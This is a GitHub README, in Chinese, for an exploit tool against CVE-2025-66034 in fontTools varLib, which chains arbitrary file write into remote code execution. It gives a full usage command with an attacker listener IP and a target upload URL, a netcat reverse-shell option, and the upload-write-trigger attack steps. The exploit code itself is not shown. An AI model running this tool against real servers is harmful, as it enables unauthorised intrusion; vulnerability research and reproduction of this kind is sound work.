symphony2colour/varlib-cve-2025-66034
GitHub: symphony2colour/varlib-cve-2025-66034
针对 fontTools varLib 可变字体生成流程中 CVE-2025-66034 漏洞的自动化利用工具,通过构造 .designspace 文件实现从任意文件写入到远程代码执行的完整攻击链。
Stars: 0 | Forks: 0
# fontTools varLib CVE-2025-66034 漏洞利用
--port
```
**如果目标使用不同的 URL 或文件系统路径,请使用下面的可用选项覆盖默认值,例如 --url 和 --path**
## 选项
| 参数 | 描述 |
|--------|--------|
| `--ip` | 攻击者监听 IP |
| `--port` | 监听端口 |
| `--path` | 写入文件的目标文件系统路径 |
| `--url` | 存在漏洞的上传端点 |
| `--no-listen` | 禁用自动 netcat 监听器 |
使用自定义选项的示例:
```
python varlib_cve_2025_66034.py --ip 10.10.10.10 --port 5050 --path /var/www/html --url http://target.com/tools/variable-font-generator/process
```
## 漏洞利用流程
1. 生成兼容的 master 字体
2. 创建恶意的 `.designspace` 文件
3. 通过 multipart POST 上传 payload
4. 在服务器上写入任意文件
5. 通过 HTTP 请求触发 payload
## 致谢 / 鸣谢
特别感谢并致敬:
- fontTools 项目的维护者和贡献者,感谢他们在开源 fontTools 库上的工作。
- 发现并负责任地披露 **CVE-2025-66034** 的安全研究人员。
- 开源安全社区,感谢他们记录和分析漏洞,帮助提高软件安全性。
提供此概念验证代码仅用于教育和研究目的,以帮助理解该漏洞及其影响。
## 免责声明
本代码**仅用于教育和研究目的**提供。
请勿针对你不拥有或未获得明确测试许可的系统使用此漏洞利用代码。
作者不对因使用本软件造成的误用或损害负责。
## 参考资料
- CVE 详情:https://nvd.nist.gov/vuln/detail/CVE-2025-66034
- GitHub 公告:https://github.com/advisories/GHSA-768j-98cg-p3fv
- fontTools 项目:https://github.com/fonttools/fonttools
- fontTools 文档:https://fonttools.readthedocs.io/
标签:CISA项目, CTF工具, CVE-2025-66034, Exploit-Dev, fontTools, PoC, Python, RCE, varLib, 任意文件写入, 可变字体, 字符串匹配, 攻击脚本, 文件上传漏洞, 无后门, 暴力破解, 概念验证, 漏洞复现, 漏洞搜索, 编程工具, 网络信息收集, 网络安全, 路径遍历, 远程代码执行, 逆向工具, 隐私保护